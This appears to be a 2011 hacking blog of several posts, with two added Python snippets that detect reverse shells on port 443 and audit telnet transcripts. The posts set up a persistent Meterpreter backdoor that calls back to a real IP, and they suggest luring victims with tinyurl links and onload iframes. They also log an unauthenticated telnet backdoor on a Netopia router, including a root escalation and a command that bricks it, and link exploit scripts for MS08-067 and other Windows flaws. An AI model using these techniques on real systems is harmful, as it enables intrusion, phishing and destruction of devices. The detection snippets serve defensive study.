>> First, it loads the "priv" plugin, so it can prepare to escalate privileges on pwned systems.
>>> Next it runs getsystem, which escalates privileges to SYSTEM.
>>>> Finally, it sets Meterpreter up as persistent post-reboot. I explain the flags below.
>>>>> -U means it runs the Meterpreter persistent backdoor on user login
>>>>>> -i 5 means it sleeps 5 seconds between reconnect retries. I set this to a big number if there's an IDS.
>>>>>>> -p 6666 is the port to connect back to where a Multi/handler is listening
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.
PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.
"run"
> This command runs the module!
"sessions -l"
> This command lists created Meterpreter/shell sessions.
"sessions -i 1" (not used here)
> Interact with session 1. -i <number of session> means interact with session <number>.
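The PROTIP about listening on 443 cuts both ways: firewalls wave 443 through, but a reverse_tcp handler on that port never speaks TLS, so the first bytes of each flow give a defender a cheap sanity check. Below is an added example (not from the original post or from Metasploit) that classifies port-443 flows by whether the client opens with a TLS ClientHello; the flows and addresses are constructed.

```python
"""Flag TCP flows to port 443 whose first bytes are not a TLS ClientHello.

Added example, not code from the original post or from Metasploit.
The sample flows below are constructed, not captured traffic.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

TLS_HANDSHAKE = 0x16      # TLS record content type: handshake
CLIENT_HELLO = 0x01       # handshake message type: ClientHello


@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    client_first: Optional[bytes]   # first payload bytes from the connecting host
    server_first: Optional[bytes]   # first payload bytes from the listener
    client_spoke_first: bool        # which side sent application data first


def looks_like_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS handshake record carrying a ClientHello:
    0x16, version 0x03 0x01..0x03, 2-byte length, handshake type 0x01."""
    if len(data) < 6:
        return False
    record_len = int.from_bytes(data[3:5], "big")
    return (data[0] == TLS_HANDSHAKE
            and data[1] == 0x03 and data[2] in (0x01, 0x02, 0x03)
            and record_len > 0
            and data[5] == CLIENT_HELLO)


def classify_flow(flow: Flow, port: int = 443) -> str:
    """Return 'tls', 'not-monitored-port', or a reason the flow is suspicious."""
    if flow.dst_port != port:
        return "not-monitored-port"
    if not flow.client_spoke_first:
        # In TLS the client always sends the first record. A staged reverse
        # shell handler that pushes its stage to a freshly connected victim
        # inverts this, so the listener talking first is a strong signal.
        return "suspicious: server spoke first"
    if not flow.client_first or not looks_like_client_hello(flow.client_first):
        return "suspicious: first client bytes are not a TLS ClientHello"
    return "tls"


def suspicious_flows(flows: List[Flow]) -> List[Tuple[str, str, str]]:
    """(src, dst, reason) for every monitored-port flow that is not TLS."""
    out = []
    for f in flows:
        verdict = classify_flow(f)
        if verdict not in ("tls", "not-monitored-port"):
            out.append((f.src, f.dst, verdict))
    return out


# Constructed samples (addresses and bytes are made up for the example).
HELLO = b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + bytes(32)
GENUINE_HTTPS = Flow("10.0.0.5", "203.0.113.10", 443, HELLO,
                     b"\x16\x03\x03\x00\x5a\x02", True)
STAGER_LIKE = Flow("10.0.0.7", "198.51.100.20", 443, None,
                   b"\x00\x50\x02\x00" + bytes(8), False)   # listener sends a length first
PLAINTEXT_ON_443 = Flow("10.0.0.9", "198.51.100.21", 443,
                        b"GET / HTTP/1.0\r\n\r\n", None, True)

if __name__ == "__main__":
    for src, dst, why in suspicious_flows([GENUINE_HTTPS, STAGER_LIKE, PLAINTEXT_ON_443]):
        print(f"{src} -> {dst}:443  {why}")
```

A payload that genuinely wraps itself in TLS passes this check; the point is the cheap first-bytes test on a port that inspection is often told to ignore.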
Once you set it up, a nasty trick is to send the link (IP:Port of server) as a tinyurl encoded link to people, so they get pwned rather swiftly. Or embed the link as an iFrame with onload into a malicious website for spear phishing...
Have fun.
~For informational and educational purposes only, I am not responsible for your use of this infodox. Don't be malicious... It's mean!
Saturday, 30 July 2011
Revisiting the Netopia Unauthenticated TELNET backdoor vulnerability and "stupidly easy privilege escalation"
So I used netcat to connect to port 23 on the router and was greeted with a nice telnet console, as expected.
The initial access was administrative, but the command "magic" gives a root shell, allowing you a few extra commands - notably the "crash" command. (to brick the box, "crash read 0x00" works well!)
So to recap, we have the following vulnerabilities...
> Unauthenticated TELNET login backdoor
> Unprotected administrative privileges
> Privilege escalation "admin to root"
> Denial of service vulnerability (brick it)
Now that is not all - the WEP key generation algorithm on these is notoriously bad, and is predictable based on the SSID - notably the Eircom ones. In the lab I was able to use mdk3 to force a Netopia router to "downgrade" from WPA to WEP.
So now we also have a "security fucking up" vulnerability to add to the pot...
Here is the log of the access and privilege escalation; I then typed "help" and quit.
root@bt:~# nc 192.168.1.254 23
Terminal shell v1.0
Copyright ©2006 Netopia, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.7.0 (build r6)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/28176900> magic
magic
(poof!)
Netopia-2000/28176900# help
help
arp to send ARP request
atmping to send ATM OAM loopback
brcm to read/write broadcom switch
clear to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log to clear stored log data
configure to configure unit's options
diagnose to run self-test
download to download config file
exit to quit this shell
help to get more: "help all" or "help help"
hotspot to set or show hotspot authentication info
install to download and program an image into flash
loopback to set the interface in loopback mode
license to enter an upgrade key to add a feature
log to add a message to the diagnostic log
loglevel to report or change diagnostic log level
netstat to show IP information
nslookup to send DNS query for host
ping to send ICMP Echo request
quit to quit this shell
reset to reset subsystems
restart to restart unit
rma_count to perform RMA functions
show to show system information
sslclient to send HTTPS request to the Server. Default Port is 433
start to start subsystem
status to show basic status of unit
telnet to telnet to a remote host
traceroute to send traceroute probes
upload to upload config file
view to view configuration summary
ata to all Remote Config of ATA's related cmds
who to show who is using the shell
bootflags to show or set the bootflags
checksum to calculate and display the cksums
console to make this session the console
mem to display or edit system memory
trace to toggle routing tracing
crash to cause system death
adsldebug to debug commands
dsm to DSM commands
set_language to set web display language
peer-address to print IP address of this shell user
? to get help: "help all" or "help help"
Netopia-2000/28176900# quit
quit
Goodbye.
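The junk at the top of a netcat session like this is telnet option negotiation (IAC bytes); the interesting part is what follows it: an admin prompt with no credential challenge, then a "#" prompt after "magic". Here is an added example, not from the original post, that strips the negotiation and audits a transcript for exactly those indicators. The transcripts are constructed to mirror the log above, and grab_banner() is the only part that talks to a device.

```python
"""Audit a telnet transcript for what the Netopia session above shows: an
admin shell handed out with no credential prompt, and a root ('#') prompt
reached through the undocumented "magic" command.

Added example, not code from the original post. Transcripts below are
constructed to mirror the log; grab_banner() is the only network-touching part.
"""
import re
import socket
from typing import List

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def strip_telnet_negotiation(raw: bytes) -> bytes:
    """Drop IAC option negotiation (the bytes that render as garbage at the
    top of a netcat session against a real telnet server)."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] != IAC:
            out.append(raw[i])
            i += 1
        elif i + 1 >= len(raw):
            break
        elif raw[i + 1] == IAC:                      # escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif raw[i + 1] in (DO, DONT, WILL, WONT):   # IAC <cmd> <option>
            i += 3
        elif raw[i + 1] == SB:                       # IAC SB ... IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = len(raw) if end < 0 else end + 2
        else:                                        # other two-byte commands
            i += 2
    return bytes(out)


def audit_transcript(raw: bytes) -> List[str]:
    """Return findings for one raw telnet transcript (bytes as received)."""
    text = strip_telnet_negotiation(raw).decode("latin-1")
    findings = []
    # A credential prompt is a line that is nothing but "login:"/"Password:".
    prompted = re.search(r"(?im)^\s*(login|user(name)?|password)\s*:\s*$", text)
    if "completed login" in text.lower() and not prompted:
        findings.append("unauthenticated admin shell: no credential prompt before login")
    if (re.search(r"(?m)^\S+>\s*magic\s*$", text)
            and re.search(r"(?m)^\S+#(\s|$)", text)):
        findings.append("privilege escalation: '#' root prompt after 'magic'")
    if re.search(r"(?m)^crash\s", text):
        findings.append("destructive command exposed: crash")
    return findings


def grab_banner(host: str, port: int = 23, timeout: float = 3.0) -> bytes:
    """Connect, send nothing, and return whatever the service volunteers."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Constructed transcripts modelled on the log above, not captured output.
OPEN_ADMIN = (b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27\r\n"
              b"Terminal shell v1.0\r\n"
              b"(Admin completed login: Full Read/Write access)\r\n"
              b"Netopia-2000/28176900> ")
ESCALATED = (OPEN_ADMIN + b"magic\r\n(poof!)\r\n"
             b"Netopia-2000/28176900# help\r\n"
             b"crash to cause system death\r\n"
             b"Netopia-2000/28176900# ")
LOCKED = b"\xff\xfb\x01\xff\xfb\x03\r\nlogin: "
```

Feeding grab_banner() output for your own router into audit_transcript() catches the first finding; the other two need the interactive part of the session, which the constructed ESCALATED transcript stands in for.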
~ This info is for educational and academic and such non evil uses only.
I ain't responsible for your misdeeds.
Ch0mpy-LAN - New Tool Release
New tool release - Ch0mpy-LAN
This tool is my lame attempt at halfheartedly scripting up a method to automate some attacks using Evilgrade, Metasploit, and Fast-Track over LAN.
Later I will recode the whole thing in python with a far more useable UI, but for now it is just proof of concept, etc, because quite frankly I am a bit lazy.
To use it, unpack the ZIP (RAR was being a fucker) file in a directory of your choice and check that the settings in /bin/evilGrade.sh are right - i.e. the path to your backdoor and the path to the evilgrade folder.
It was written with BackTrack 5 in mind using the tweaks I outlined in a previous blog post.
Just chmod +x the shell script and run the perl script; it's fairly self-explanatory...
Have fun :)
~oh, I take NO responsibility for malicious use of ANY of my tools.
Your fault if you do something stupid.
DOWNLOAD: http://dl.dropbox.com/u/36983782/ch0mpy-lan.zip
Bobby_Tables.py - A rapid MySQL database extraction utility.
Ok, here goes. This is bobby_tables.py, a script designed to rapidly enumerate tables and dump them to .csv files.
It was task specific as a challenge in automation when it was written a long time ago, but after that development was discontinued.
I reckon poor Bobby here deserves another chance!
This is the newer version; I will edit this post later to include an older variant of the script. Just edit it as per the comments and run python bobby_tables.py for winning!
http://pastebin.com/raw.php?i=SN1hxs4z <--- SOURCE CODE
Enjoy and use responsibly.
Friday, 29 July 2011
Quick script for metasploit exploitation over LAN of a few microsoft vulns...
This is a quick perl script that allows you to fire a few exploits (with the meterpreter bindshell payload) to exploit the following microsoft vulnerabilities...
MS-08-067
MS-10-061
MS-03-026
MS-04-031
MS-07-029
Link to script (fuckms.pl)
http://pastebin.com/raw.php?i=8pw4Z6Dz
Some infodox about the exploits...
MS-08-067 Netapi exploit
> Used by Conficker to spread, later used by Stuxnet...
> http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
MS-10-061 Spoolss Exploit
> Used by Stuxnet to spread, originally thought to be 0day but was not...
> http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx
MS-03-026
> http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx
> An old exploit... good though :)
MS-04-031
> http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
> Worth a try... Sometimes.
MS-07-029
> http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
> Never had a chance to test it :(
So, if you have any input/feedback/complaints, hit me with em :)
Tweaking BackTrack 5 for maximum effectiveness.
Ok, so you downloaded BackTrack 5. As did 9001 other security-interested people, ranging from script kiddies to professional pentesters and equally professional blackhats.
The first thing you notice is, it is *not* perfect. Fast-Track is half broken by the updated MetaSploit Framework, and some tools are just plain missing.
## Updating, adding tools.
In fact, some people preferred Gnack-Track, which is now End-of-Lifed thanks to the shiny new GNOME BackTrack for those of us who despise the Fisher-Price interfaces of KDE.
So, first off, we run apt-get update && apt-get upgrade to install any nice new "fixes" that the team has come up with.
Next, if you miss some of the stuff from the GnackTrack system, or just want to update and add more awesomeness, go here for the BT5-fix script that "fixes" some things and adds others...
https://www.phillips321.co.uk/bt5-fixit-sh/
So now we have updated a bunch of stuff, installed new tools, but what next?
Ever notice how much of a pain in the ass it is that every time you load BT5 you spend a moment starting WICD daemon so you can connect to wireless networks?
## Adding WICD to init.d
root@bt:~# cd /etc/init.d/
root@bt:/etc/init.d/# gedit
Now save the following shell script as "wicdstarter.sh" in /etc/init.d/.
#!/bin/bash
# startup script for WICD daemon
# starts wicd
echo "[+] STARTING WICD"
/etc/init.d/wicd start
echo "[+] WICD INITIATED"
Now run the following command: "update-rc.d wicdstarter.sh defaults"
Followed by "chmod +x wicdstarter.sh"
That adds the Wicd Start script to init.d, saving you 0.5 seconds of your day.
## Fixing Fast-Track.
Now Fast-Track's DB-Autopwn automation seems to fail miserably since the update to MSF, so let me refer you to Zero Cold's website for the fix he came up with.
http://zerocold.co.uk/?p=801
It works fine and now those of you who use that feature have it.
Also, check out his fine guide to NeXpose Installation on BT5 and MSF NeXpose Integration...
http://zerocold.co.uk/?p=840
## Adding ZeroCold's Meterpreter Scripts for Post Exploitation.
http://forum.intern0t.net/other-programming-languages/2121-installer-sh.html
That "installer script" should install all his goodies. Let me see if it works (doing all this as I type)
Ok, it needs modification to function correctly. LETS MOD!
Modified code ---> http://pastebin.com/raw.php?i=iYRZSra9
Now I see the use for SOME of the scripts, others I am not so sure about. Though I reckon they are somewhat useful in a pentest to prove the amount of power one can have over a compromised system...
## Wi-fEye Fixing and Installation (and installing evilgrade + hamster)
Hamster and Ferret installation...
I put the Hamster-2.0.0 zip file in /root/work while I worked on it.
root@bt:~/work# unzip hamster-2.0.0.zip
root@bt:~/work# cd hamster
root@bt:~/work/hamster# cd build
root@bt:~/work/hamster/build# cd gcc4
root@bt:~/work/hamster/build/gcc4# make
root@bt:~/work/hamster/build/gcc4# cd ..
root@bt:~/work/hamster/build# cd ..
root@bt:~/work/hamster# cd ..
root@bt:~/work# cd ferret
root@bt:~/work/ferret# cd build
root@bt:~/work/ferret/build# cd gcc4
root@bt:~/work/ferret/build/gcc4# make
root@bt:~/work/ferret/build/gcc4# cd ..
root@bt:~/work/ferret/build# cd ..
root@bt:~/work/ferret# cd bin
root@bt:~/work/ferret/bin# mv ferret ~/work/hamster/bin/
root@bt:~/work/ferret/bin# cd ~/work
root@bt:~/work# mv hamster /pentest
DONE!
That is Hamster and Ferret installed in /pentest/hamster/ where Wi-fEye can use them!
###
Now lets install evilgrade-ng...
First run "apt-get install expect" to install the weird dependencies.
Now we are back in the work directory and this is very easy.
root@bt:~/work# tar -xf isr-evilgrade-2.0.0.tar.gz
root@bt:~/work# mv isr-evilgrade evilgrade
root@bt:~/work# mv evilgrade /opt
Now it gets a bit harder. "WHY WONT IT FUCKING RUN!" is a common cry I hear.
It is because we need the Data::Dump perl module, which I will now show you how to install using the CPAN shell...
root@bt:~/work# cpan
Now it will ask a buttload of questions to which I just say "yes" lol
cpan[1]> install Data::Dump
I promptly get a load of output. I just say yes, again, to any options.
Once it is done doing "lots of shit" just type exit then you can run Evilgrade
Now lets install Wi-fEye...
###
Wi-fEye installation!
root@bt:~/work# tar -xf Wi-fEye-v0.5.6.tar.gz
root@bt:~/work# cd Wi-fEye-v0.5.6
root@bt:~/work/Wi-fEye-v0.5.6# gedit Wi-fEye.py
Now check that the paths to the tools it calls are correct. What they should be is covered in the Wi-fEye documentation...
http://wi-feye.za1d.com/Documentation.html <--- better Wi-fEye infodox there!
Also download Wi-fEye from there
Download Evilgrade-ng here
http://www.infobyte.com.ar/developments.html
I cannot find a good Hamster download for the life of me, so here is one:
http://www.mediafire.com/?8486i3frg82wo11
http://dl.dropbox.com/u/36983782/hamster-2.0.0.zip
YOUTUBE VIDEO NOW ADDED!
Enjoy...